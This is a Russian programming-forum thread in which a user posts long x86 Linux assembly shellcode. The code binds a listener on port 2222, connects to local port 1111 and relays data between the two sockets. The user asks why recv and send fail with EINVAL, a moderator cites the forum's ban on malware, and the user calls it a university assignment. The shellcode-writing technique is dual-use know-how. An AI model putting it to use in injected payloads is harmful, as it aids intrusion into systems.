Форум программистов, компьютерный форум, киберфорум
Наши страницы
Assembler: Linux
Войти
Регистрация
Восстановить пароль
 
Рейтинг 5.00/5: Рейтинг темы: голосов - 5, средняя оценка - 5.00
UWasya
0 / 0 / 0
Регистрация: 13.09.2013
Сообщений: 35
1

Assembler linux. Socket recv and socket send invalid arguments

06.09.2015, 20:42. Просмотров 980. Ответов 3
Метки нет (Все метки)

Пишу шеллкод. Он ожидает подключения с 2222 порта, сам подключается на 1111 порт, выделяет память, и должен выполняться пересылка сообщений между этими подключениями. Но на вызовах recv и send я получаю ошибку в strace
socket_subcall(0xbfffe790, 0xb7fde000, 0x64, 0, 0x804845e, 0, 0, 0) = -1 EINVAL (Invalid argument)

Все вроде правильно.
Assembler
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
Системный вызов для сокетов.
long sys_socketcall(int call, unsigned long __user *args)
eax = 102
Первый аргумент (в регистр ebx) - номер вызова для сокета (/usr/include/linux/net.h).
Второй аргумент (в регистр ecx)- указатель на массив аргументов вызова
 
Пример:
mov eax,102
mov ebx,SYS_BIND
mov ecx,args
int 0x80
 
Номера вызовов:
#define SYS_SOCKET  1       /* sys_socket(2)        */
#define SYS_BIND    2       /* sys_bind(2)          */
#define SYS_CONNECT 3       /* sys_connect(2)       */
#define SYS_LISTEN  4       /* sys_listen(2)        */
#define SYS_ACCEPT  5       /* sys_accept(2)        */
#define SYS_GETSOCKNAME 6       /* sys_getsockname(2)       */
#define SYS_GETPEERNAME 7       /* sys_getpeername(2)       */
#define SYS_SOCKETPAIR  8       /* sys_socketpair(2)        */
#define SYS_SEND    9       /* sys_send(2)          */
#define SYS_RECV    10      /* sys_recv(2)          */
#define SYS_SENDTO  11      /* sys_sendto(2)        */
#define SYS_RECVFROM    12      /* sys_recvfrom(2)      */
#define SYS_SHUTDOWN    13      /* sys_shutdown(2)      */
#define SYS_SETSOCKOPT  14      /* sys_setsockopt(2)        */
#define SYS_GETSOCKOPT  15      /* sys_getsockopt(2)        */
#define SYS_SENDMSG 16      /* sys_sendmsg(2)       */
#define SYS_RECVMSG 17      /* sys_recvmsg(2)       */
#define SYS_ACCEPT4 18
Часть шеллкода
Assembler
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
xor eax,eax
    push eax
    ;push IPPROTO_IP
    inc eax
    push eax
    ;push SOCK_STREAM
    inc eax
    push eax
    ;push AF_INET
    xor ebx,ebx
    inc ebx
    ;ebx = SYS_SOCKET
    mov ecx,esp
    ;ecx = args
    mov al,102
    int 0x80
    ;socketcall(SYS_SOCKET,esp) => socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
 
    xor ecx,ecx ;fill struct
    mov ecx,0xFFFFFFFF
    sub ecx,0xFEFFFF80
    push ecx
    ;sin_addr.s_addr = 0
    xor ecx,ecx
    mov cx,0xae08
    push cx
    ;sin_port=htons(2222)
    xor ebx,ebx
    mov bl,2
    push bx
    ;sin_family = AF_INET
    mov ecx,esp
    mov bl,16
    push ebx
    ;push 16
    push ecx
    ;push addr
    push eax
    ;push sock
    xor ebx,ebx
    mov bl,2
    ;ebx = SYS_BIND
    xor ecx,ecx
    mov ecx,esp
    ;ecx = args
    ;save descriptor
    mov [ebp-4],eax
    xor eax,eax
    mov al,102
    int 0x80
    ;socketcall(SYS_BIND,esp) => bind(eax,{.sin_family=AF_INET,.sin_port=2222,.sin_addr=0.0.0.0},16)
 
    xor ebx,ebx
    mov bl,100
    push ebx
    ;push 100
    xor ebx,ebx
    mov ebx,[ebp-4]
    push ebx
    ;push sock
    xor ebx,ebx
    mov bl,4
    ;ebx = SYS_LISTEN
    xor ecx,ecx
    mov ecx,esp
    ;ecx = args
    mov al,102
    int 0x80
    ;socketcall(SYS_LISTEN,esp) => listen(ebp,100)
 
    xor eax,eax
    push eax
    push eax
    xor esi,esi
    mov esi,[ebp-4]
    push esi
    mov [ebp-8],esp
 
accept_cycle:
    xor ecx,ecx
    mov ecx,[ebp-8]
    xor ebx,ebx
    mov bl,5 ;accept
    mov al,102
    int 0x80
 
    xor ecx,ecx
    mov cl,-1
    cmp eax,ecx
    jne short good_accept
 
    ;not good accept
    xor eax,eax
    mov al,6
    xor ebx,ebx
    mov ebx,[ebp-12]
    int 0x80
 
    xor eax,eax
    mov al,6
    xor ebx,ebx
    mov ebx,[ebp-16]
    int 0x80
 
    xor eax,eax
    mov al,1
    xor ebx,ebx
    inc ebx
    int 0x80    ;exit(1)
 
good_accept:
    mov [ebp-12],eax ;save accept sock
 
    xor eax,eax
    mov al,2
    int 0x80
    ;fork
 
    xor ebx,ebx
    cmp eax,ebx
    je short child
 
    xor eax,eax
    mov al,6
    xor ebx,ebx
    mov ebx,[ebp-12]
    int 0x80
    jmp accept_cycle
 
child:
;in child process
    xor eax,eax
    push eax
    ;push IPPROTO_IP
    inc eax
    push eax
    ;push SOCK_STREAM
    inc eax
    push eax
    ;push AF_INET
    xor ecx,ecx
    mov ecx,esp
    ;ecx = args
    xor ebx,ebx
    inc ebx
    ;ebx = SYS_SOCKET
    xor eax,eax
    mov al,102
    int 0x80
    ;socketcall(SYS_SOCKET,esp) => socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
 
    mov [ebp-16],eax ;connect socket
    xor ecx,ecx ;fill struct
    mov ecx,0xFFFFFFFF
    sub ecx,0xFEFFFF80
    push ecx
    ;sin_addr.s_addr = 0
    xor ecx,ecx
    mov cx,0x5704
    ;mov cx,0xffff
    ;sub cx,0xe9ff
    push cx
    ;sin_port=htons(1111)
    xor ebx,ebx
    mov bl,2
    push bx
    ;sin_family = AF_INET
    mov ecx,esp
    xor ebx,ebx
    mov bl,16
    push ebx
    ;push 16
    push ecx
    ;push addr
    push eax
    ;push sock
    xor ebx,ebx
    mov bl,3
    ;ebx = SYS_BIND
    mov ecx,esp
    ;ecx = args
    xor eax,eax
    mov al,102
    int 0x80
    ;socketcall(SYS_BIND,esp) => connect(eax,{.sin_family=AF_INET,.sin_port=1111,.sin_addr=127.0.0.1},16)
 
    xor ecx,ecx
    mov ecx,0xffffff91
    cmp eax,ecx
    jne short connect_good
 
    ;not good connect
    xor eax,eax
    mov al,6
    xor ebx,ebx
    mov ebx,[ebp-12]
    int 0x80
 
    xor eax,eax
    mov al,6
    xor ebx,ebx
    mov ebx,[ebp-16]
    int 0x80
 
    xor eax,eax
    mov al,1
    xor ebx,ebx
    inc ebx
    int 0x80    ;exit(1)
 
connect_good:    
    xor eax,eax
    xor ebx,ebx
    xor ecx,ecx
    xor edi,edi
    xor esi, esi
    mov al,192
    push ebp
    xor ebp,ebp
    mov cl,100
    xor edx,edx
    mov dl,0x22
    mov esi,edx
    xor edx,edx
    mov dl,3
    int 0x80
    ;mmap
 
    pop ebp
    mov [ebp-20],eax 
 
    xor eax,eax
    mov al,2
    int 0x80
    ;fork
 
    xor ecx,ecx
    cmp eax,ecx
    jne short parent_else
 
    **xor ecx,ecx
    push ecx
    xor ecx,ecx
    mov cl,100
    push ecx
    ;100
    xor ecx,ecx
    mov ecx,[ebp-20]
    push ecx
    ;buf
    xor ecx,ecx
    mov ecx,[ebp-12]
    push ecx
    ;accept_sock
    mov [ebp-24],esp
    ;args for recv
 
 
recv_cycle:
    xor ecx,ecx
    mov ecx,[ebp-24]
    ;args recv
 
    xor ebx,ebx
    mov bl,10
    ;SYS_RECV
 
    xor eax,eax
    mov al,102
    int 0x80
    ;recv(accept_sock, buf, 100, 0)**
 
    xor ecx,ecx
    mov cx,0x17a7
    cmp eax,ecx
    je recv_cycle
 
    xor ecx,ecx
    push ecx
 
    xor ecx,ecx
    mov ecx,eax
    push ecx
    ;buffer_size
 
    xor ecx,ecx
    mov ecx,[ebp-20]
    push ecx
    ;buf
 
    xor ecx,ecx
    mov ecx,[ebp-16]
    push ecx
    ;accept_sock
 
    xor ecx,ecx
    mov ecx,esp
    ;args for send
 
    xor ebx,ebx
    mov bl,9
    ;SYS_SEND
 
    xor eax,eax
    mov al,102
    int 0x80
    ;send(connect_sock, buf, read_size, 0)
 
    pop ecx
    pop ecx
    pop ecx
 
    jmp recv_cycle
 
parent_else:    
    xor ecx,ecx
    push ecx
 
    xor ecx,ecx
    mov cl,100
    push ecx
    ;100
 
    xor ecx,ecx
    mov ecx,[ebp-20]
    push ecx
    ;buf
 
    xor ecx,ecx
    mov ecx,[ebp-16]
    push ecx
    ;connect_sock
 
    mov [ebp-28],esp
    ;args for recv1
 
recv_cycle1:
    xor ecx,ecx
    mov ecx,[ebp-28]
    ;args recv1
 
    xor ebx,ebx
    mov bl,10
    ;SYS_RECV
 
    xor eax,eax
    mov al,102
    int 0x80
    ;recv(accept_sock, buf, 100, 0)
 
    xor ecx,ecx
    mov cl,-1
    cmp eax,ecx
    je recv_cycle1
 
    xor ecx,ecx
    push ecx
 
    xor ecx,ecx
    mov ecx,eax
    push ecx
    ;buffer_size
 
    xor ecx,ecx
    mov ecx,[ebp-20]
    push ecx
    ;buf
 
    xor ecx,ecx
    mov ecx,[ebp-12]
    push ecx
    ;accept_sock
 
    xor ecx,ecx
    mov ecx,esp
    ;args for send
 
    xor ebx,ebx
    mov bl,9
    ;SYS_SEND
 
    xor eax,eax
    mov al,102
    int 0x80
    ;send(connect_sock, buf, read_size, 0)
 
    pop ecx
    pop ecx
    pop ecx
 
    jmp recv_cycle1
Если лень изучать много кода, вот короткий пример из другой реализации. До него все исполняется корректно без ошибок. Но после на recv вызове strace снова показывает socket_subcall(0xbfffe790, 0xb7fde000, 0x64, 0, 0x804845e, 0, 0, 0) = -1 EINVAL (Invalid argument)
Assembler
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
xor eax, eax
push eax
mov al, 100
push eax
mov ebx, [ebp+buf]
push ebx
push ecx
mov ecx, [ebp+sockcon]
 
xor ebx,ebx
mov bl,10
;ebx = SYS_RECV
 
mov ecx,esp
;ecx = args
 
xor eax,eax
mov al,102
int 0x80
;call Recv
0
Similar
Эксперт
41792 / 34177 / 6122
Регистрация: 12.04.2006
Сообщений: 57,940
06.09.2015, 20:42
Ответы с готовыми решениями:

SOCKET: send(), recv()
Начал разбираться с сокетами и в самом начале застрял на элементарном, с функциями send и recv, в...

Send/recv on listener socket
После переведения сокета в режим прослушивания (bind, listen), возможны ли на нем операции...

WinApi Socket send(), recv() pool realtime.
Задали задачку: 1. Написати програму-клієнт яка б відправляла довільні дані на сервер, якщо...

Невозможно создать Socket: Socket sock = new Socket(someHostString,somePortInt);
Народ! Помогите пожалуйста. Вся красота губится на exception что выскакивает в момент создания...

recv (socket api)
при первом в хождении в цикл рекв возвращает как положено количество принятых байт,но потом...

3
Mikl___
Автор FAQ
13486 / 6417 / 635
Регистрация: 11.11.2010
Сообщений: 11,588
07.09.2015, 04:47 2
UWasya,
Правила форума cyberforum.ru
5. Запреты и ограничения.
7. Запрещено создание и распространение вредоносного ПО, вирусов, кряков и взлома лицензионного софта, а также публикация ссылок для их скачивания.
0
UWasya
0 / 0 / 0
Регистрация: 13.09.2013
Сообщений: 35
07.09.2015, 10:54  [ТС] 3
Цитата Сообщение от Mikl___ Посмотреть сообщение
5. Запреты и ограничения.
7. Запрещено создание и распространение вредоносного ПО, вирусов, кряков и взлома лицензионного софта, а также публикация ссылок для их скачивания.
это институтское задание.
0
Mikl___
Автор FAQ
13486 / 6417 / 635
Регистрация: 11.11.2010
Сообщений: 11,588
07.09.2015, 11:12 4
UWasya,
а тут могут забанить и за меньшее
0
07.09.2015, 11:12
MoreAnswers
Эксперт
37091 / 29110 / 5898
Регистрация: 17.06.2006
Сообщений: 43,301
07.09.2015, 11:12

Socket.timeout при повторном recv()
Python 3.5 Windows Есть некая железка на микроконтроллере , работающая по TCP/IP , на ней...

Обработка функции recv структуры SOCKET
Прошу помощи как обработать полученную информацию из функции recv структуры SOCKET. к примеру: ...

Send struct from socket
Здравствуйте, помогите пожалуйста отправить структуру на ++... typedef struct { unsigned int...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
4
Ответ Создать тему
Опции темы

КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin® Version 3.8.9
Copyright ©2000 - 2019, vBulletin Solutions, Inc.
Рейтинг@Mail.ru